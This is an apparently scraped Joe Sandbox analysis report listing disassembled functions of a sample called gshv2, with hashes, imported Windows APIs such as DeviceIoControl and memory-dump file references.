Opcode ID: 53bbe513d6043a045ccfb63609f901d86e2d04d49f32a0eb9675648861bb7206
Instruction ID: 6764da2d5049e584cb11f6cd29e5c4969dba0c4ed66882e2b7ce2c43a82d39ff
Opcode Fuzzy Hash: 53bbe513d6043a045ccfb63609f901d86e2d04d49f32a0eb9675648861bb7206
Instruction Fuzzy Hash: E712E633D18B8D86E612CB3784411B9B350FFBF394F189B22FE44765A6DF26B5919A00

Function 00007FF62C0C5330 Relevance: 2.8, APIs: 2, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d42a1b31f9bd6ee6d1fd2feccca42872808724cb3d7c468e2db4ab3fe56b7035
Instruction ID: 76a28ddb60ea27548f6c35a55bfda64a951130a1c6e562ecd4546d3ed339995a
Opcode Fuzzy Hash: d42a1b31f9bd6ee6d1fd2feccca42872808724cb3d7c468e2db4ab3fe56b7035
Instruction Fuzzy Hash: D2F1E436908BC585EB21CB3698412FDB360FF99364F444331EA98A36E5DF3EE2559B01

Function 00007FF62C0C66A0 Relevance: 2.8, Strings: 2, Instructions: 262COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00007FF62C0C6713
VUUU, xrefs: 00007FF62C0C66F3

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID:
String ID: VUUU$VUUU
API String ID: 0-3149182767
Opcode ID: 0f8cecac8536b6d0cb46413152174230d91df9aa532cdd01f7b53e2bdcdaf0da
Instruction ID: 8f110b94384e8a928b3531e6053b1900516f611975eb438275859b23a799ecac
Opcode Fuzzy Hash: 0f8cecac8536b6d0cb46413152174230d91df9aa532cdd01f7b53e2bdcdaf0da
Instruction Fuzzy Hash: 23C1C633E10F889AE711CB3AD4415ED7361FF6A798714A322FA08736A5DF349691DB80

Function 00007FF62C0B8340 Relevance: 2.7, APIs: 2, Instructions: 224COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B8468
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B86B9

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: faf3b7368253874c9ffcba96a518e5b659a5afacd4e08c0bf914dc2a8f8f4d1e
Instruction ID: e45432b4d5b3f04ec6040fcb382e6bfcbe1697a82c6f39a7c5140c2f59217a63
Opcode Fuzzy Hash: faf3b7368253874c9ffcba96a518e5b659a5afacd4e08c0bf914dc2a8f8f4d1e
Instruction Fuzzy Hash: CFA1F332A186C586DB21CB3AD8013B9B760FF9A795F04D331DA4DA3766EF39E0458705

Function 00007FF62C0AB622 Relevance: 2.0, Strings: 1, Instructions: 726COMMON

Download Yara Rule

Strings

#COLLAPSE, xrefs: 00007FF62C0ABAC2

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID:
String ID: #COLLAPSE
API String ID: 0-1971961705
Opcode ID: 20704602c30e8f7d14693f2bf7996d2b8e19796cd929c65679a8339519f00479
Instruction ID: 761830e5e213b91d4d50fa989a9d687d4b707d41f8db3c9aef478cedcba9ec6b
Opcode Fuzzy Hash: 20704602c30e8f7d14693f2bf7996d2b8e19796cd929c65679a8339519f00479
Instruction Fuzzy Hash: B382E933E14B859BD71ACB3789412E9B7A0FF99354F088735DB68A75A1DF35B0A08B01

Function 00007FF62C0C20B0 Relevance: 1.7, APIs: 1, Instructions: 490COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FF62C0C2391

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7768ee70df9f1be6c6be9d15398015b0a2e38ea12b7b6868443f5c03073a7df7
Instruction ID: 2ed9244ba3aacb8b8f8383a86dd94c05fd0cc15d7c322b6f952674722c12f359
Opcode Fuzzy Hash: 7768ee70df9f1be6c6be9d15398015b0a2e38ea12b7b6868443f5c03073a7df7
Instruction Fuzzy Hash: A7423C36B04A8586EB10CF6AD8846AD77B0FB88F94F158232DE4D93B64CF3AD545CB01

Function 00007FF62C0BFD60 Relevance: 1.6, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

..- -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X..., xrefs: 00007FF62C0BFD99

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID:
String ID: ..- -XXXXXXX- X - X -XXXXXXX - XXXXXXX- XX ..- -X.....X- X.X - X.X -X.....X - X.....X- X..X --- -XXX.XXX- X...X - X...
API String ID: 0-3803095028
Opcode ID: 218a0e5558113a225ca9cbe391981ab1577581ea511b89db67796e9e99ca6975
Instruction ID: 5c9e3ec041f9dab4fe580bedab39567d7e534cfce9bc5aff2fb2e1b8a7c4bccd
Opcode Fuzzy Hash: 218a0e5558113a225ca9cbe391981ab1577581ea511b89db67796e9e99ca6975
Instruction Fuzzy Hash: ADD124733046C885DB50CB29D8C5A7CBBA6F394B41B4AC536DF89823A1EB3EC45AD350

Function 00007FF62C0B9730 Relevance: 1.4, APIs: 1, Instructions: 197COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF62C0B978A

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: d7adb221d5b1c7e5067e8f62bb95bc6066cdbedf7a24165e5a61d5a7fc50765e
Instruction ID: ccc273832dd3d211a2a888b73492bb1164c43becc7366409b637c8c5629740bd
Opcode Fuzzy Hash: d7adb221d5b1c7e5067e8f62bb95bc6066cdbedf7a24165e5a61d5a7fc50765e
Instruction Fuzzy Hash: EC615DA3A1C2E602DB968B3C6C5127D6EE0F749354F1C9234FE8AC2B85CE3ED505C642

Function 00007FF62C0B9480 Relevance: 1.4, APIs: 1, Instructions: 195COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF62C0B94EA

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 8eed4aab18b5d89a036806fca9f100d2c91603a7416674e8dc2189e501d6239e
Instruction ID: 8183778c6b8cc978aa98b553e870c3e7112c6d2debfb7f97e5dff34dde8c44fe
Opcode Fuzzy Hash: 8eed4aab18b5d89a036806fca9f100d2c91603a7416674e8dc2189e501d6239e
Instruction Fuzzy Hash: A661E873B1C6E186DB158B38E805A79BEE4E79A314F498275DA8CC3A49DE2FD401C701

Function 00007FF62C0B7650 Relevance: .4, Instructions: 360COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e9a0bf960e819e35033acc633f5680460bcfd59f40b907fbf38096adb97bafd
Instruction ID: 7431a222343100e997515d506dc73a7a7aeaeebc96d3c37710a9b291351de4ae
Opcode Fuzzy Hash: 3e9a0bf960e819e35033acc633f5680460bcfd59f40b907fbf38096adb97bafd
Instruction Fuzzy Hash: 09F10723D28B8D45E623D73748425B9B250AFBF394F1DEB22FD48715B2DF297181AA10

Function 00007FF62C0B0000 Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a0ac2a9af8508545b889fea58bc9f2bbe78c257fe82df19433fbb8e3e8bc75b
Instruction ID: d5714ac0e94c3151d2c0829addb2f5661a6eee20932499d11fa3d270d94f4f74
Opcode Fuzzy Hash: 9a0ac2a9af8508545b889fea58bc9f2bbe78c257fe82df19433fbb8e3e8bc75b
Instruction Fuzzy Hash: 89F108B2A0878586EB55CF3288406F973A0FF55FA8F0C8635DE4CA7295EF3AA444C751

Function 00007FF62C0B9DD0 Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: floorf$ceilf$memset
String ID:
API String ID: 2375660335-0
Opcode ID: 9c8ab991e7f5f617ffc01fe6062675e96fd093031b5f8cb3fa02ab2643b98122
Instruction ID: 36a70b0604b806892d7b6cb7721c00d119d88c12e6b8d23f405516d053f5f6f8
Opcode Fuzzy Hash: 9c8ab991e7f5f617ffc01fe6062675e96fd093031b5f8cb3fa02ab2643b98122
Instruction Fuzzy Hash: 02E1E333A18A9086D325CB35D4416BDB7A0FF9D794F058326FB89A3658EB3CE591CB00

Function 00007FF62C0AD570 Relevance: .3, Instructions: 302COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9735ea7b2be2e9c5a6772eaefec726a9bb04cf68889cd24a3d141d0ac0cbec37
Instruction ID: 2560b316ab2cd4b7631a81e67f656b4393f40d5114bda794caa7ca86ff3ad43c
Opcode Fuzzy Hash: 9735ea7b2be2e9c5a6772eaefec726a9bb04cf68889cd24a3d141d0ac0cbec37
Instruction Fuzzy Hash: 9BE1CA33C0C78D85E652973748421B8B350AFBE765F1CDB32EA48B60B1EF2A75859603

Function 00007FF62C0AFA70 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a3f36570f85c2238c854589cc2ee0b6e171a9191c84a99dd0cd0bc83fa3fd14
Instruction ID: f4810cecbd7af69961b10dae61f8ec4a58490b6229695311fa643973e7e82790
Opcode Fuzzy Hash: 0a3f36570f85c2238c854589cc2ee0b6e171a9191c84a99dd0cd0bc83fa3fd14
Instruction Fuzzy Hash: E6A10673D0924A45EF5B973758423B86650AFAA790F28CB36DF08B6491DF2B70D44B03

Function 00007FF62C0B5F70 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70f8022893f4e9f8fc02ab15a839f37ae4ed80ed91b8abbfc294aff9ea974759
Instruction ID: 9e36eb3bb5b887133d61bb7654659a6a065aededc892ea48f178e3f9c3a8f896
Opcode Fuzzy Hash: 70f8022893f4e9f8fc02ab15a839f37ae4ed80ed91b8abbfc294aff9ea974759
Instruction Fuzzy Hash: DFA1D233A18A98CAE701DF3E94412BDB7B0FB48399F144225EF8963665DF39B585CB00

Function 00007FF62C0B3650 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
Instruction ID: cc5cad956dec079ce3ce97275aa9f6e0b8fb38d8ee053daf5492b4d82fae6baf
Opcode Fuzzy Hash: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
Instruction Fuzzy Hash: 4851EBA6B244B147DE50CF2AD8815BC3791E345B53FE48476D65DC2F51CA2EC10ADF21

Function 00007FF62C0C0860 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83e64e682ec1f794001b1b404ba3f0b3273a8fcaaef219915f658c7d4be8d4dd
Instruction ID: 808011916b1b2b2ed40502be4eae3ae5be1ea0827f29bbd3d38abb26642c8ac2
Opcode Fuzzy Hash: 83e64e682ec1f794001b1b404ba3f0b3273a8fcaaef219915f658c7d4be8d4dd
Instruction Fuzzy Hash: 7641E631A0D34941FD2187235980B7D6251EF6A794F18C732DD9C63BC4DF3AE581D682

Function 00007FF62C0A2E50 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 386e57bee0f0d2b45f17089fc473765588494f963e9afe0e7ba8e99d7e83554b
Instruction ID: b427a8e1f45fefc5d23455d4545f8f53496d106a362509e09025dbb5a5110b3b
Opcode Fuzzy Hash: 386e57bee0f0d2b45f17089fc473765588494f963e9afe0e7ba8e99d7e83554b
Instruction Fuzzy Hash: 9431F93773469647EF4C8734ED22B782691E389341FC9A539EE5EC66C1DB2DD4518302

Function 00007FF62C0D027C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca523bfe88f2caad33b5de9b86c66ae7e317bf4edfc0c40f5e71ad535e4a84b6
Instruction ID: 4849c7b9a8df1ab7dd34f08a52c01b9e3e7b0f17cca3781077851781bb8c5e0f
Opcode Fuzzy Hash: ca523bfe88f2caad33b5de9b86c66ae7e317bf4edfc0c40f5e71ad535e4a84b6
Instruction Fuzzy Hash: C2A0022990EC03D0EE448B00ED508302330FB74724B50C032C20ED20609F3EE840C342

Function 00007FF62C0A6770 Relevance: 34.8, APIs: 23, Instructions: 311
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A67C8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A6864
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A68A8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A68E0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A6918
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A6957
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A698F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A69F1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A6A29
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A6A61
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A6A99
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A6AD1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A6B15
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A6B5F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A6B97
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A6BCF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A6C07
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A6C59
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A6C9D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A6CD5
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF62C0A6CF6
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF62C0A6D04
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0A6D3D

Part of subcall function 00007FF62C0B2720: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0A67AC), ref: 00007FF62C0B2784
Part of subcall function 00007FF62C0B2720: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF62C0B27BE
Part of subcall function 00007FF62C0B2720: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0A67AC), ref: 00007FF62C0B27ED
Part of subcall function 00007FF62C0B2720: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0A67AC), ref: 00007FF62C0B2815
Part of subcall function 00007FF62C0B2720: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF62C0A67AC), ref: 00007FF62C0B283D

Memory Dump Source

Source File: 00000000.00000002.1759826375.00007FF62C0A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0A0000, based on PE: true

Associated: 00000000.00000002.1759813611.00007FF62C0A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759848040.00007FF62C0D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759862729.00007FF62C0DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759874955.00007FF62C0DF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff62c0a0000_gshv2.jbxd

Similarity

API ID: free$__acrt_iob_funcfclose
String ID:
API String ID: 3697265371-0
Opcode ID: 454b35d564d6e5944ac5200d73b9475ed702926fe6c3a68b9f5488d28c3c39e9
Instruction ID: 095b59c090d12bd3173d57744cfcd48ccc6bcc11e06323a61caea1af633815c6
Opcode Fuzzy Hash: 454b35d564d6e5944ac5200d73b9475ed702926fe6c3a68b9f5488d28c3c39e9
Instruction Fuzzy Hash: 70F11835B1AB8292EE488B61D9802B873B4FF85BA0F585035CB1D93755CF3EE5619313

Function 00007FF62C0C7570 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 359
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeviceIoControl.KERNEL32 ref: 00007FF62C0C7625
DeviceIoControl.KERNEL32 ref: 00007FF62C0C7694
DeviceIoControl.KERNEL32 ref: 00007FF62C0C76FA
DeviceIoControl.KERNEL32 ref: 00007FF62C0C775B
DeviceIoControl.KERNEL32 ref: 00007FF62C0C77C8
DeviceIoControl.KERNEL32 ref: 00007FF62C0C7837
DeviceIoControl.KERNEL32 ref: 00007FF62C0C78A7
DeviceIoControl.KERNEL32 ref: 00007FF62C0C791D
DeviceIoControl.KERNEL32 ref: 00007FF62C0C7990
DeviceIoControl.KERNEL32 ref: 00007FF62C0C7A02
DeviceIoControl.KERNEL32 ref: 00007FF62C0C7A71
DeviceIoControl.KERNEL32 ref: 00007FF62C0C7AE0
DeviceIoControl.KERNEL32 ref: 00007FF62C0C7B57
DeviceIoControl.KERNEL32 ref: 00007FF62C0C7BC9
DeviceIoControl.KERNEL32 ref: 00007FF62C0C7C62
